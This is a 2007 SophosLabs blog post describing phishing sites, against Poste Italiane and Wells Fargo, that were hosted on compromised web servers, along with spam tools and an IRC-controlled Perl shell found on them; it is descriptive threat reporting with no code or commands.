In this section

• Home
• Security
• SophosLabs blog
• 2007
• 05

• Analyses
• SophosLabs
• SophosLabs blog
• Spyware and adware
• Top 10 malware
• Hoaxes
• Technical papers
• Email notification
• Best practice
• White papers
• Web seminars
• Podcasts
• Hot topics

28 May 2007 13:15 GMT

A Prickly Problem

Another relatively quiet shift on the malware front, but a little more life within the spam feeds. There have been a number of phishing attacks successfully intercepted today. The usual mixture of targetted brands were present, including Brazilian, American and British banks. Some of the attacks used domains specifically constructed for the job, others used legitimate sites. As noted in a previous post on phishing attacks using compromised sites, digging a little deeper can often reveal some interesting information. Two of the cases probed today are discussed below.

The first interesting phish today targetted Poste Italiane Group (again).

Looking at the URL of the phish site, it was clearly a compromised machine. The host site appears to use RRDtool (a logging and graphing application) and Cacti (its graphical frontend). Someone appears to have compromised the site and upload additional content into one of the directories hosting RRD files. Aside from hosting the phishing site, MailMailer (from softSWOT) is present, suggesting that the compromised site is also being used to send spam. Also, a Perl remote shell was discovered. Once running, this connects to a remote IRC server to await commands. Shells such as this are typically used to scan remote machines and launch exploit or denial of service (DoS) attacks.

One of the other compromised sites used by a phishing attack was uncovered when investigating an attack against Wells Fargo.

Again inspecting the URL of the phish site, revealed it to be hosted on a compromised site, in this case a reasonably popular news/sport/music portal. In this case the hackers seem happy to openly brag of their achievements, dropping their tag within the compromised site (obscenity removed from image):

These (and many other similar) cases reflect the freedom that intruders have to upload whatever content they wish to a compromised site. Of course, nowadays that content is usually geared towards achieving financial gain (eg. phishing attack or installation of malware).

Fraser Howard, SophosLabs UK

• Bookmark with del.icio.us
• Submit this story to digg
• Submit this story to slashdot